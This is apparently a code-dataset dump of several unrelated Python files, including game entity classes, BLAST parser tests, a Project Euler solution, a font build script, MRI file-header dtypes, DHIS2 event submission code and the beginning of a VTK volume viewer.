content stringlengths 5 1.05M |
|---|
from bullet import Bullet
from vector import Vector
import math
import random
class Entity:
    """Base class for anything on the board: a position, hit points and a color."""

    def __init__(self, start_position: Vector, health: int, color):
        # Order of assignment is irrelevant; grouped position/health first.
        self.position = start_position
        self.health = health
        self.color = color
class Player(Entity):
    """The user-controlled entity: 100 HP, white, tracks bullets and score."""

    def __init__(self, start_position: Vector, power: int = 10):
        # BUG FIX: super(self.__class__, self) resolves the class at runtime and
        # recurses forever if Player is ever subclassed; zero-argument super()
        # is the safe Python 3 form.
        super().__init__(start_position, 100, (255, 255, 255))
        self.power = power    # damage dealt per hit
        self.bullets = []     # live Bullet instances fired by this player
        self.points = 0       # accumulated score
        self.width = 20
        self.height = 20

    def move_down(self):
        """Shift the player 4 px down."""
        self.position.add(Vector(0, 4))

    def move_up(self):
        """Shift the player 4 px up."""
        self.position.add(Vector(0, -4))

    def move_right(self):
        """Shift the player 4 px right."""
        self.position.add(Vector(4, 0))

    def move_left(self):
        """Shift the player 4 px left."""
        self.position.add(Vector(-4, 0))

    def add_bullet(self, position: Vector):
        """Spawn a new bullet at *position*."""
        self.bullets.append(Bullet(position))

    def level_up(self):
        """Increase damage by 10 per level."""
        self.power += 10
class Enemy(Entity):
    """A hostile entity spawned at a random board position.

    NOTE(review): the ``start_position`` argument is ignored — the position is
    always randomized inside a 480x600 board; the parameter is kept only for
    interface compatibility with existing callers.
    """

    def __init__(self, start_position: Vector, power: int, movement: str = "rand"):
        self.movement = movement
        self.power = power
        self.width = 15
        self.height = 15
        # BUG FIX: super(self.__class__, self) recurses forever under further
        # subclassing; use the zero-argument super() form.
        super().__init__(
            Vector(
                random.randrange(self.width, 480 - self.width),
                random.randrange(self.height, 600 - self.height)
            ), 100 * self.power, (255, 0, 0)
        )
        # Per-frame drift derived deterministically from the spawn position.
        self.delta_vector = Vector(
            int(math.cos(math.radians(self.position.x)) * 10) // 2,
            int(math.sin(math.radians(self.position.y)) * 10) // 2)

    def update_position(self):
        """Advance the enemy by its drift vector."""
        self.position.add(self.delta_vector)
|
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Copyright (c) 2013--, biocore development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from string import split, strip
from os import popen, remove
from glob import glob
from unittest import TestCase, main
from cogent.parse.blast import QMEBlast9
from bfillings.blast import (seqs_to_stream, make_subject_match_scorer,
make_shotgun_scorer, keep_everything_scorer,
ids_from_seq_lower_threshold, PsiBlast,
psiblast_n_neighbors)
class BlastTests(TestCase):
    """Tests of top-level functions"""
    # NOTE(review): this module targets legacy Python 2 / PyCogent-era APIs
    # (``from string import split``, ``assertItemsEqual``, ``failUnless``,
    # ``popen``) — it will not run unmodified on Python 3.
    # The tests that call formatdb/psiblast require the NCBI legacy BLAST
    # binaries on PATH and create/remove files in the working directory.

    def setUp(self):
        """Define some standard data"""
        # Tabular BLAST 9 output: two PSI-BLAST iterations for query ece:Z4181
        # followed by a single iteration for query ece:Z4182.
        self.rec = """# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ece:Z4181 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-06 52.8
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 2
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ece:Z4181 100.00 110 0 0 1 110 1 110 3e-54 211
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-54 211
ece:Z4181 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-08 59.0
ece:Z4181 sfl:CP0138 33.98 103 57 2 8 110 6 97 6e-06 50.5
ece:Z4181 spt:SPA2730 37.50 72 45 0 39 110 30 101 1e-05 49.8
ece:Z4181 sec:SC2804 37.50 72 45 0 39 110 30 101 1e-05 49.8
ece:Z4181 stm:STM2872 37.50 72 45 0 39 110 30 101 1e-05 49.8
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4182
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4182 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4182 ecs:ECs3718 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4182 cvi:CV2422 41.67 72 42 0 39 110 29 100 2e-06 52.8""".split('\n')
        # Smaller variant of self.rec with overlapping-but-different hit sets.
        self.rec2 = """# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ece:Z4181 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 spt:SPA2730 37.50 72 45 0 39 110 30 101 1e-05 49.8
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 2
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-54 211
ece:Z4181 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-08 59.0
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4182
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4182 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4182 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-06 52.8""".split('\n')
        # Three queries (Z4181/Z4182/Z4183); exercises the scorers' handling of
        # hits shared across queries.  Note the duplicated/missing header lines
        # at the top are intentional parser fodder.
        self.rec3 = """# BLASTP 2.2.10 [Oct-19-2004]
# BLASTP 2.2.10 [Oct-19-2004]
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 spt:SPA2730 37.50 72 45 0 39 110 30 101 1e-05 49.8
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4182
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4182 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4182 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-06 52.8
# BLASTP 2.2.10 [Oct-19-2004]
# Query: ece:Z4183
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4183 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4183 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-54 211
ece:Z4183 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-08 59.0""".split('\n')
        # FASTA query sequences; query_1 is also present in self.fasta_recs.
        self.query_1 = """>gi|100002553| Bd2556c Bd2556c two-component system sensor histidine kinase 3092017:3094158 reverse MW:81963
MRLKNRLNNWISIRMGMVIVIFLGVSCGSMRSSTPPPAKDRLTEIDSLERLLPDCPTIASTLPLLRRLAFLYQQQSEMKVYNERLYENAMAVDSISVAYLGLKNLAEYYYDQSVRDSLEYYCSLVDSIAKARHEYPNVLFDVKSLSSQDLLWLGNYELAMSEAMDLYRLASNLDHRYGLLRCSETLGLIYQRIRRDSDAVVSFQESLDLLKDIKDVPDIMDTKVRLTSYQLESSVRTKQYASTERILGQYMALLDEQYKIYQEKNDLLSIKREYWLLYSFYTSFYLSQGDLENAKRSLDQASSYADSNWVEGDYAINTYLTVKARYHKAAGDIPLALHCINEVLETERLPEDIQFKADILKEQGQLGEVMALYDELYSTLTKRRGTSFLRQVNQLRTLHELHEKELKETELKEAGQRIARKQDLLIFILSISVVLLILLYVLFLYYRHLRSLKNQLQREKELLLESQRQLIKEKTRAEEASLMKSAFLANMSHEVRTPLNAIVGFSGLLVEPSTDEEERKEYSSIIRNNTDLMLNLVNDVLDLSRMETGDLHFDIKDHLLLVCCQMALESVRHRIPDGVKLTFSPAGEPIVVHVDNLRLQQLLTNLLTNAAKFTEKGEINLSFQLEPDRKKVCIAVTDTGAGIPLEKQATIFNRFEKLDDYKPGVGLGLSICLLIAERLDGALFIDSSYTDGARFVLILSCEIDSSIYNPPIEV"""
        self.query_2 = """>gi|100002557| Bd2560c Bd2560c conserved hypothetical protein 3097971:3098210 reverse MW:8927
MGKNQLIHGNEFHLLKQAEIHKATGKLVESLNLAAGSTGGFDIYKVVEAYFTDLEKRKEINDLLGISEPCETRVTEECFS
"""
        # Ten-protein FASTA database written to disk and formatted with
        # formatdb by the psiblast tests below.
        self.fasta_recs = """>gi|100002550| Bd2553c Bd2553c conserved hypothetical protein 3090609:3091013 reverse MW:14682
MMDFISVPLVVGIVCAGIYGLFELFVRKRERLAIIEKIGDKLDTSAFDGKLGLPNYMRNFSFSSLKAGCLLAGIGLGLLVGFIINMCMATNSYYDDGWYRHEVAGTAYGASVLLFGGIGLIIAFVIELKLGKNNK
>gi|100002551| Bd2554 Bd2554 RNA polymerase ECF-type sigma factor 3091112:3091717 forward MW:23408
LLPQVVTYLPGLRPLSTMELYTDTYYIQRIQAGDVACFACLLDKYSRPIHSLILKVVRSQEEAEELAQDTFMKVFKNLASFKGDCSFSTWIYRIAYNTAISSVRKKRYEFLAIEETTLENVSEEEITNLFGQTESTEQVQRLEVALEQLLPDERALILLFYWKEKTIEELVSITGLTASNIKVKLHRIRKKLFVLLNGMDHE
>gi|100002552| Bd2555 Bd2555 conserved hypothetical protein 3091713:3092066 forward MW:13332
MSKINTNKEQPDLLGDLFKRIPEEELPASFRSNVMRQIMLESAKAKKRDERFSLLAAIVASLIMISLAIVSFVYMEIPKIAIPTISTSALAFYLYIGAITLILLLADYKLRNLFHKKG
>gi|100002553| Bd2556c Bd2556c two-component system sensor histidine kinase 3092017:3094158 reverse MW:81963
MRLKNRLNNWISIRMGMVIVIFLGVSCGSMRSSTPPPAKDRLTEIDSLERLLPDCPTIASTLPLLRRLAFLYQQQSEMKVYNERLYENAMAVDSISVAYLGLKNLAEYYYDQSVRDSLEYYCSLVDSIAKARHEYPNVLFDVKSLSSQDLLWLGNYELAMSEAMDLYRLASNLDHRYGLLRCSETLGLIYQRIRRDSDAVVSFQESLDLLKDIKDVPDIMDTKVRLTSYQLESSVRTKQYASTERILGQYMALLDEQYKIYQEKNDLLSIKREYWLLYSFYTSFYLSQGDLENAKRSLDQASSYADSNWVEGDYAINTYLTVKARYHKAAGDIPLALHCINEVLETERLPEDIQFKADILKEQGQLGEVMALYDELYSTLTKRRGTSFLRQVNQLRTLHELHEKELKETELKEAGQRIARKQDLLIFILSISVVLLILLYVLFLYYRHLRSLKNQLQREKELLLESQRQLIKEKTRAEEASLMKSAFLANMSHEVRTPLNAIVGFSGLLVEPSTDEEERKEYSSIIRNNTDLMLNLVNDVLDLSRMETGDLHFDIKDHLLLVCCQMALESVRHRIPDGVKLTFSPAGEPIVVHVDNLRLQQLLTNLLTNAAKFTEKGEINLSFQLEPDRKKVCIAVTDTGAGIPLEKQATIFNRFEKLDDYKPGVGLGLSICLLIAERLDGALFIDSSYTDGARFVLILSCEIDSSIYNPPIEV
>gi|100002554| Bd2557c Bd2557c two-component system sensor histidine kinase 3094158:3095507 reverse MW:51247
LERKYNGEGKIFPVKRHRCLMSCYYCELYTMKGNSGKAQAYLDQATAYLDSSFGDRVEAQYLRTKSFYYWKEKDYRHALSAVNLALKINRDLDKLEMKKAVLQSSGQLQEAVTIYEEIINKTETINTDAFDRQIEQLRVLNDLNDLEKQDRELKLKSEQEALKQKQIVVSIGLLLVLMGLLYMLWRIYMHTKRLRNELLQEKDSLTASEKQLRVVTKEAEAANKKKSAFIANISHEVRTPLNAIVGFSELLASSEYSEEEKIRFAGEVNHSSELLLNLVNDVLDLSRLESGKIKFSVKPNDLVACCQRALDSIRHRVKPGVRLTFTPSIESYTLNTDALRLQQLLTNLLSNAAKFTSEGEINLSFTVDEGKEEVCFSVTDTGCGIPEDKCEKIFERFEKLDDFIQGTGLGLSVCQIISEQLNGSLSVDISYKDGARFVFIHPTNLIETPI
>gi|100002555| Bd2558c Bd2558c hypothetical protein 3095527:3095985 reverse MW:17134
LRGKNIHLGRVGCNYGKLLIFIDIYFVSLRIVSDKSMSRGFLRKSSVNTFIGIVWILFAVGTSAQNAVSKFRADSIRQSLSRIQKPQDKIPLLKELIGLYWQLPEEVLALKEIIDIAMPLDSIGIVYDAMAGLSRYYPAIRTFVRVGGALETV
>gi|100002556| Bd2559 Bd2559 30S ribosomal protein S1 3096095:3097882 forward MW:67092
MENLKNIQPVEDFNWDAFEQGETYTEVSKDDLVKTYDETLNTVKDKEVVMGTVTSMNKREVVVNIGFKSDGVVPMSEFRYNPDLKIGDEVEVYIESQEDKKGQLILSHKKARATRSWDRVNEALEKDEIIKGYIKCRTKGGMIVDVFGIEAFLPGSQIDVKPIRDYDVFVGKTMEFKIVKINQEFKNVVVSHKALIEAELEQQKKDIISKLEKGQVLEGTVKNITSYGVFIDLGGVDGLIHITDLSWGRVSHPEEIVQLDQKINVVILDFDDEKKRIALGLKQLTPHPWDALDTNLKVGDKVKGKVVVMADYGAFIEIAPGVEGLIHVSEMSWTQHLRSAQDFMKVGDEIEAVILTLDRDERKMSLGIKQLKADPWENIEERFPVGSRHAAKVRNFTNFGVFVEIEEGVDGLIHISDLSWTKKIKHPSEFTQIGAEIEVQVLEIDKENRRLSLGHKQLEENPWDVFETIFTVGSIHEGTIIEVLDKGAVISLPYGVEGFATPKHLVKEDGSQAQVDEKLSFKVIEFNKEAKRIILSHSRIFEDEQKGAKATSEKKASSKRGGKKEEESGMVTGPVEKTTLGDIEELAALKEKLSGK
>gi|100002557| Bd2560c Bd2560c conserved hypothetical protein 3097971:3098210 reverse MW:8927
MGKNQLIHGNEFHLLKQAEIHKATGKLVESLNLAAGSTGGFDIYKVVEAYFTDLEKRKEINDLLGISEPCETRVTEECFS
>gi|100002558| Bd2561 Bd2561 phosphoglycolate phosphatase 3098389:3099033 forward MW:24182
MKKLVIFDLDGTLLNTIADLAHSTNHALRQNGFPTHDVKEYNFFVGNGINKLFERALPEGEKTAENILKVREEFLKHYDLHNTDRSVPYPGVPELLALLQERGIKLAVASNKYQAATRKLIAHFFPSIQFTEVLGQREGVKAKPDPSIVNEIVERASISKESTLYVGDSDVDMQTAINSEVTSCGVTWGFRPRTELEKYAPDHIAEKAEDILKFI
>gi|100002559| Bd2562 Bd2562 conserved hypothetical protein 3099382:3100299 forward MW:35872
MSGNIKKIVEPNSGIDYSLEKDFKIFTLSKELPITTYPSYIRLGIVIYCVKGNAKIDIYSNKHIITPKELIIILPGQLVALTDVSVDFQIRYFTITESFYSDILSGISRFSPHFFFYMRQHYYFKMEDVETLSFVDFFELLIRKAVDPENQYRRESVILLLRILFLDIYNHYKVNSLDSTATIDVHKKELTHKFFQLVMSNYKVNRSVTFYANSLCITPKYLTMVVKEVSGKSAKDWITEYMILELKGLLTNSTLNIQEIVEKTQFSNQSSLGRFFRRHTGLSPLQYRKKYLTTEQRTNFSKNNTI
"""

    def test_seqs_to_stream(self):
        """seqs_to_stream should iterate over seqs"""
        sts = seqs_to_stream
        # Three accepted input handlers; anything else raises TypeError.
        self.assertEqual(list(sts('>a\nTG\n>b\nWW\n', \
            '_input_as_multiline_string')),\
            [['>a','TG'],['>b','WW']])
        #skipping test for file open
        self.assertEqual(list(sts(['TG','WW'], '_input_as_seqs')), \
            [['>0','TG'],['>1','WW']])
        self.assertEqual(list(sts(['>a','TG','>b','WW'], \
            '_input_as_lines')),\
            [['>a','TG'],['>b','WW']])
        self.assertRaises(TypeError, sts, 'abc', 'xyz')

    def test_make_subject_match_scorer(self):
        """make_subject_match_scorer should keep ids matching n queries"""
        # Scorer keeps queries whose hits cover at least n distinct subjects.
        qm1 = make_subject_match_scorer(1)
        qm3 = make_subject_match_scorer(3)
        qm5 = make_subject_match_scorer(5)
        qmes = wrap_qmes(QMEBlast9(self.rec3))
        self.assertItemsEqual(qm1(qmes), ['ece:Z4181','ece:Z4182','ece:Z4183'])
        self.assertItemsEqual(qm3(qmes), ['ece:Z4181','ece:Z4183'])
        self.assertItemsEqual(qm5(qmes), [])

    def test_make_shotgun_scorer(self):
        """make_shotgun_scorer should keep ids matching n queries"""
        sg1 = make_shotgun_scorer(1)
        sg2 = make_shotgun_scorer(2)
        sg3 = make_shotgun_scorer(3)
        sg4 = make_shotgun_scorer(4)
        sg5 = make_shotgun_scorer(5)
        qmes = wrap_qmes(QMEBlast9(self.rec3))
        # With threshold 1, shotgun scoring degenerates to keep-everything.
        self.assertItemsEqual(sg1(qmes), keep_everything_scorer(qmes))
        self.assertItemsEqual(sg2(qmes), \
            ['ece:Z4181','ece:Z4182','ece:Z4183','cvi:CV2421','ecs:ECs3717'])
        self.assertItemsEqual(sg3(qmes), \
            ['ece:Z4181','ece:Z4182','ece:Z4183'])
        self.assertItemsEqual(sg4(qmes), \
            ['ece:Z4182'])
        self.assertItemsEqual(sg5(qmes), [])

    def test_keep_everything_scorer(self):
        """keep_everything_scorer should keep all ids found."""
        k = keep_everything_scorer(wrap_qmes(QMEBlast9(self.rec2)))
        self.assertItemsEqual(k, \
            ['ece:Z4181','ecs:ECs3717','spt:SPA2730','cvi:CV2421','ece:Z4182'])

    def test_ids_from_seq_lower_threshold(self):
        "ids_from_seq_lower_threshold returns psiblast hits, decreasing sens"
        # Builds a real BLAST database on disk, so formatdb must be installed.
        bdb_seqs = self.fasta_recs
        f = open('test_bdb', 'w')
        f.write(bdb_seqs)
        f.close()
        temp = popen('formatdb -i test_bdb -o T -p T')
        params = {'-j':2,
                  '-d':'test_bdb'}
        query = self.query_1.split('\n')
        app = PsiBlast(params=params,
                       InputHandler='_input_as_lines')
        #the command below should result in finding itself and 2554
        #it should run for max_iterations
        result = ids_from_seq_lower_threshold(query, n=12, \
            max_iterations=4, app=app, core_threshold=1e-50, \
            lower_threshold=1e-20, step=10000)
        self.assertEqual(result[0],\
            [('gi|100002553', '0.0'), ('gi|100002554', '0.0')])
        self.assertEqual(result[1], 4)
        #if n=2, it should find the same sequences but only run for 1 iteration
        #since it would hit n after the first blast search
        result = ids_from_seq_lower_threshold(query, n=2, \
            max_iterations=4, app=app, core_threshold=1e-50, \
            lower_threshold=1e-20, step=10000)
        self.assertEqual(result[0],\
            [('gi|100002553', '0.0'), ('gi|100002554', '0.0')])
        self.assertEqual(result[1], 1)
        query = self.query_2.split('\n')
        #query_2_s e-value for itself is 9e-47, it should not be found
        #with the lower_threshold set to 1e-48
        result = ids_from_seq_lower_threshold(query, n=12, \
            max_iterations=4, app=app, core_threshold=1e-50, \
            lower_threshold=1e-48, step=10000)
        self.assertEqual(result[0], [])
        #it also should not be found if the max_iterations is set to 1
        result = ids_from_seq_lower_threshold(query, n=12, \
            max_iterations=1, app=app, core_threshold=1e-50, \
            lower_threshold=1e-20, step=10000)
        self.assertEqual(result[0], [])
        # Clean up the formatdb artifacts created above.
        for fname in ['formatdb.log'] + glob('test_bdb*'):
            remove(fname)

    def test_psiblast_n_neighbors(self):
        "psiblast_n_neighbors psiblasts and stops when n neighbors are reached"
        bdb_seqs = self.fasta_recs
        f = open('test_bdb', 'w')
        f.write(bdb_seqs)
        f.close()
        temp = popen('formatdb -i test_bdb -o T -p T')
        params = {'-j':11}
        lines = bdb_seqs.split('\n')
        results = psiblast_n_neighbors(lines, n=12, blast_db='test_bdb', \
            method='lower_threshold', params=params,\
            core_threshold=1e-50, step=10000)
        #there should be 10 result entries since there were 10 queries
        self.assertEqual(len(results), 10)
        for i in results:
            #each query should at least find itself
            self.failUnless(len(results[i][0]) >= 1)
            #each query should iterate 8 times since it can never reach max
            # NOTE(review): the assertion below checks 11 iterations (the -j
            # parameter), not 8 as the comment above claims — confirm intent.
            self.assertEqual(results[i][1], 11)
        for fname in ['formatdb.log'] + glob('test_bdb*'):
            remove(fname)
def wrap_qmes(qmes):
    """Converts qmes into a dict of {q:{m:e}}"""
    wrapped = {}
    for query, match, evalue in qmes:
        # setdefault creates the inner mapping on first sight of each query.
        wrapped.setdefault(query, {})[match] = evalue
    return wrapped
# Run the unittest entry point when executed as a script.
if __name__ == "__main__":
    main()
|
'''
Find the sum of the digits in the number 100!
'''
def fact(n):
    """Return n! (values of n <= 1 yield 1, matching the original contract).

    Iterative rather than recursive, so large n cannot hit the interpreter's
    recursion limit.
    """
    result = 1
    for i in range(2, n + 1):
        result *= i
    return result


# Project Euler 20: sum of the digits in the number 100!
# (str() is directly iterable — no intermediate list needed.)
print(sum(map(int, str(fact(100)))))
from java import util
class MyList(util.ArrayList):
    """ArrayList subclass exposing a helper that returns the list's size."""

    def calc_size(self):
        # BUG FIX: the source contained a stray ``<ref>`` marker
        # (``self.si<ref>ze()``) — an IDE-completion fixture artifact that is
        # not valid Python syntax.
        return self.size()
# Font generation script from Ionicons
# https://github.com/driftyco/ionicons/
# http://ionicons.com/
from subprocess import call
import os
BUILDER_PATH = os.path.dirname(os.path.abspath(__file__))
def main():
    # Entry point: regenerate the icon font files via fontforge.
    generate_font_files()
def generate_font_files():
    # Shell out to fontforge, which executes generate_font.py from the
    # builder directory.  (Python 2 print statement — this script is py2.)
    print "Generate Fonts"
    cmd = "fontforge -script %s/generate_font.py" % (BUILDER_PATH)
    # NOTE(review): shell=True with an interpolated path is fine for a trusted
    # build script, but would be unsafe if BUILDER_PATH were untrusted.
    call(cmd, shell=True)
# Allow running the font build directly from the command line.
if __name__ == "__main__":
    main()
|
import numpy as np
# Layout constants for Siemens "MultiRAID" measurement files.
align_to_nbytes = 512
max_raidfile_entries = 64

# 8B file header: record count precedes the measurement table.
MrParcRaidFileHeader = [("hdSize_", "<u4"),  # ID???
                        ("count_", "<u4")]   # # of meas
# 152B per-measurement table entry.
MrParcRaidFileEntry = [("measId_", "<u4"),    # MeasID
                       ("fileId_", "<u4"),    # FileID
                       ("off_", "<u8"),       # Measurement offset
                       ("len_", "<u8"),       # Measurement length
                       ("patName_", "<S64"),  # Patient name
                       ("protName_", "<S64")] # Protocol name
# 9736B = 8 + 64 * 152.
# CONSISTENCY FIX: use the named max_raidfile_entries constant instead of a
# hard-coded 64 so the two stay in sync.
MultiRaidFileHeader = [("hdr", MrParcRaidFileHeader),
                       ("entry", (MrParcRaidFileEntry, max_raidfile_entries))]
# Rebind the field-list prototypes as concrete numpy structured dtypes.
MultiRaidFileHeader = np.dtype(MultiRaidFileHeader)
MrParcRaidFileHeader = np.dtype(MrParcRaidFileHeader)
MrParcRaidFileEntry = np.dtype(MrParcRaidFileEntry)

# 8B prefix of a single measurement block.
SingleMeasInit = [("hdr_len", "<u4"),
                  ("unknown", "<u4")]  # usually value 4
SingleMeasInit = np.dtype(SingleMeasInit)
|
from schema import Optional as SchemaOptional, SchemaError
from schema import Regex, Schema
from corehq.motech.dhis2.const import DHIS2_API_VERSION
from corehq.motech.exceptions import ConfigurationError
from corehq.motech.value_source import (
CaseTriggerInfo,
get_form_question_values,
get_value,
)
def send_dhis2_event(request, form_config, payload):
    """Build a DHIS2 Event from *payload* and POST it via *request*.

    Raises ConfigurationError (from validate_event_schema) if the built
    event does not conform to the DHIS2 Event schema.
    """
    event = get_event(request.domain_name, form_config, payload)
    validate_event_schema(event)
    return request.post('/api/%s/events' % DHIS2_API_VERSION, json=event,
                        raise_for_status=True)
def get_event(domain, config, form_json):
    """Assemble a DHIS2 Event dict from a form submission and its config."""
    info = CaseTriggerInfo(
        domain=domain,
        case_id=None,
        form_question_values=get_form_question_values(form_json),
    )
    # Each builder contributes zero or more event properties.
    builders = (
        _get_program,
        _get_org_unit,
        _get_event_date,
        _get_event_status,
        _get_completed_date,
        _get_datavalues,
    )
    event = {}
    for build in builders:
        event.update(build(config, info))
    return event
def _get_program(config, case_trigger_info):
return {'program': config.program_id}
def _get_org_unit(config, case_trigger_info):
org_unit_id = None
if config.org_unit_id:
org_unit_id = get_value(config.org_unit_id, case_trigger_info)
if org_unit_id:
return {'orgUnit': org_unit_id}
return {}
def _get_event_date(config, case_trigger_info):
    """Resolve the configured event-date value source into "eventDate"."""
    return {'eventDate': get_value(config.event_date, case_trigger_info)}
def _get_event_status(config, case_trigger_info):
return {'status': config.event_status}
def _get_completed_date(config, case_trigger_info):
completed_date = None
if config.completed_date:
completed_date = get_value(config.completed_date, case_trigger_info)
if completed_date:
return {'completedDate': completed_date}
return {}
def _get_datavalues(config, case_trigger_info):
values = []
for data_value in config.datavalue_maps:
values.append({
'dataElement': data_value.data_element_id,
'value': get_value(data_value.value, case_trigger_info)
})
return {'dataValues': values}
def validate_event_schema(event):
    """
    Raises ConfigurationError if ``event`` is missing required
    properties, or value data types are invalid.
    """
    try:
        Schema(get_event_schema()).validate(event)
    except SchemaError as err:
        # Chain the SchemaError so the validation detail stays visible.
        raise ConfigurationError from err
def get_event_schema() -> dict:
    """
    Returns the schema for a DHIS2 Event.
    >>> event = {
    ... "program": "eBAyeGv0exc",
    ... "orgUnit": "DiszpKrYNg8",
    ... "eventDate": "2013-05-17",
    ... "status": "COMPLETED",
    ... "completedDate": "2013-05-18",
    ... "storedBy": "admin",
    ... "coordinate": {
    ... "latitude": 59.8,
    ... "longitude": 10.9
    ... },
    ... "dataValues": [
    ... { "dataElement": "qrur9Dvnyt5", "value": "22" },
    ... { "dataElement": "oZg33kd9taw", "value": "Male" },
    ... { "dataElement": "msodh3rEMJa", "value": "2013-05-18" }
    ... ]
    ... }
    >>> Schema(get_event_schema()).is_valid(event)
    True
    """
    # Dates are plain ISO "YYYY-MM-DD" strings, not datetimes.
    date_str = Regex(r"^\d{4}-\d{2}-\d{2}$")
    dhis2_id_str = Regex(r"^[A-Za-z0-9]+$")  # (ASCII \w without underscore)
    return {
        "program": dhis2_id_str,
        "orgUnit": dhis2_id_str,
        "eventDate": date_str,
        SchemaOptional("completedDate"): date_str,
        SchemaOptional("status"): Regex("^(ACTIVE|COMPLETED|VISITED|SCHEDULE|OVERDUE|SKIPPED)$"),
        SchemaOptional("storedBy"): str,
        SchemaOptional("coordinate"): {
            "latitude": float,
            "longitude": float,
        },
        SchemaOptional("geometry"): {
            "type": str,
            "coordinates": [float],
        },
        SchemaOptional("assignedUser"): dhis2_id_str,
        # "value" is deliberately unconstrained — any JSON value is accepted.
        "dataValues": [{
            "dataElement": dhis2_id_str,
            "value": object,
        }],
    }
|
from typing import Any, Optional, Dict
from dataclasses import dataclass
import json
from numpy import ndarray
from optmlstat.formatting import convert_data_for_json
@dataclass(frozen=True)
class OptimizationProblemEvaluation:
    """Immutable record of evaluating an optimization problem at a batch of points.

    Arrays are 2-D with one row per evaluated point; constraint/objective
    arrays are optional because not every problem defines them.
    """

    opt_prob: Any
    x_array_2d: ndarray
    obj_fcn_array_2d: Optional[ndarray] = None
    ineq_cnst_array_2d: Optional[ndarray] = None
    eq_cnst_array_2d: Optional[ndarray] = None

    def to_json_data(self) -> Dict[str, Any]:
        """Return a JSON-serializable mapping of every field."""
        return dict(
            opt_prob=self.opt_prob,
            x_array_2d=self.x_array_2d,
            obj_fcn_array_2d=self.obj_fcn_array_2d,
            ineq_cnst_array_2d=self.ineq_cnst_array_2d,
            # BUG FIX: this entry previously re-emitted ineq_cnst_array_2d,
            # so the equality-constraint values were never serialized.
            eq_cnst_array_2d=self.eq_cnst_array_2d,
        )

    def __repr__(self) -> str:
        return json.dumps(self.to_json_data(), indent=2, default=convert_data_for_json)
|
# display scalar images in volume
class show3D :
    """Volume-render a scalar ITK image in a Qt/VTK window.

    Wires an ITK image through FlipImageFilter -> ChangeInformationImageFilter
    -> ImageToVTKImageFilter into a vtkVolumeTextureMapper2D, with an outline
    actor around the volume.  Color/opacity transfer functions are rebuilt
    from the image's scalar range by AdaptColorAndOpacity().
    """
    def __init__(self, input=None, MinOpacity=0.0, MaxOpacity=0.1) :
        import qt
        import vtk
        from vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor
        self.__MinOpacity__ = MinOpacity
        self.__MaxOpacity__ = MaxOpacity
        # every QT app needs an app
        self.__app__ = qt.QApplication(['itkviewer'])
        # create the widget
        self.__widget__ = QVTKRenderWindowInteractor()
        self.__ren__ = vtk.vtkRenderer()
        self.__widget__.GetRenderWindow().AddRenderer(self.__ren__)
        self.__itkvtkConverter__ = None
        self.__volumeMapper__ = vtk.vtkVolumeTextureMapper2D()
        self.__volume__ = vtk.vtkVolume()
        self.__volumeProperty__ = vtk.vtkVolumeProperty()
        self.__volume__.SetMapper(self.__volumeMapper__)
        self.__volume__.SetProperty(self.__volumeProperty__)
        self.__ren__.AddVolume(self.__volume__)
        # outline pipeline is created lazily on the first SetInput() call
        self.__outline__ = None
        self.__outlineMapper__ = None
